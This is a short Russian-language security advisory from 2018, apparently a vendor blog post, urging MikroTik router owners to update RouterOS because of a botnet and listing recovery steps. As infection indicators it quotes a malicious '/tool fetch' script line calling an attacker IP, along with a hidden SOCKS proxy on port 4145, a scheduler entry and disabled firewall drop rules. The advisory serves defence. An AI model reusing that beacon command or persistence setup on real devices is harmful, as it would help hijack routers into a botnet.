Важно! Срочно обновите прошивки Mikrotik до последней версии!

07.09.2018

Обнаружен ботнет из устройств MikroTik, использующих старые версии RouterOS (с 6.29 по v6.42.1). В связи с этим необходимо срочно обновить прошивки на всех устройствах, самый простой способ сделать это - нажать кнопку "Check for updates" в меню System -> Packages.

Желательно проделать следующие шаги:

1. Обновить RouterOS до последней стабильной версии

2. Поменять пароли всех пользователей

3. Восстановить конфигурацию и проверить её на наличие неизвестных настроек

4. Настроить фаирвол (можно использовать статью https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router)

Понять что роутер заражен, можно понять следующим образом:

— Отключены все drop правила на файрволле.
— Включается socks (IP – Socks) на нестандартном порте, в моем случае 4145.
— Добавлен скрипт /tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no в System – Scripts
— Добавлен запуск скрипта в System – Scheduler.
— Удаляет существующие скрипты (по сообщениям на форуме Mikrotik).

Так же рекомендуем сделать /export в терминале и проверить конфигурацию глазами.

← Кэшбэк от TOTOLINK График работы в предпраздничные дни 2019 - 2020 →

Важно! Срочно обновите прошивки Mikrotik до последней версии!

Комментарии

Написать комментарий